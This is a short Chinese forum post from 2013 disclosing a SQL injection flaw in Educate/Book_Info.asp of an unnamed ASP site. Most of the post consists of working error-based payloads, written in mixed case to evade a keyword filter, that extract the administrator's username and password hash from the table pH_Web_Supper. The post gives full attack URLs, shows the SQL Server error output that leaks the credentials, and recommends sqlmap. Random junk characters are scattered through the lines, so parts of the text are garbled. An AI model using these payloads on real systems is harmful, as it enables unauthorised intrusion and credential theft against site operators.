漏洞出现在Educate/Book_Info.asp 5 m! n) C8 H, G" q! v
' s- f @; C- N. X* A此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
! d% n. G9 L# I7 I' W, L 3 N9 Y8 @1 ~/ u3 j' S4 W- P
exp:如下
) S% N4 j. S: U7 D1 x) B, u. R查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)2 u! W* A- B" e q& Z6 b5 Q" a4 ~
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
0 z+ x! z x; q, D' N4 |
; f5 G- V3 J( q4 K" ~5 vhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
' \" D5 \, a) V- F1 s" n: W. H ~- e [) [9 I9 j" ?+ k1 O
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
9 h# @7 r4 g |0 P0 _
- X2 L& P% j3 a9 J- _5 Y; A8 c将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
; `1 p5 }7 e0 l" a! `" E 2 V6 K' X, L( P; V2 F/ U7 D
/Educate/Book_Info.asp,行 8" r t. |: G7 S- _
0 D! V5 M" c/ ?, |9 P3 ?$ Z
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)) k3 v; _. E8 B; l: \$ w
# A8 U/ [' Q+ m# i+ Y6 D$ H0 DMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
! ?4 d. g- {2 J& @ " p* f! U9 x: g7 a! J3 c* o9 {
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
$ ^6 M d6 g: q, P
. D( W$ s9 [' G: l n7 Q. Q! e- E/Educate/Book_Info.asp,行 8
+ U! K; q0 q" ~+ E2 t% K |
发表于 2013-2-16 21:44:16
收藏
支持
反对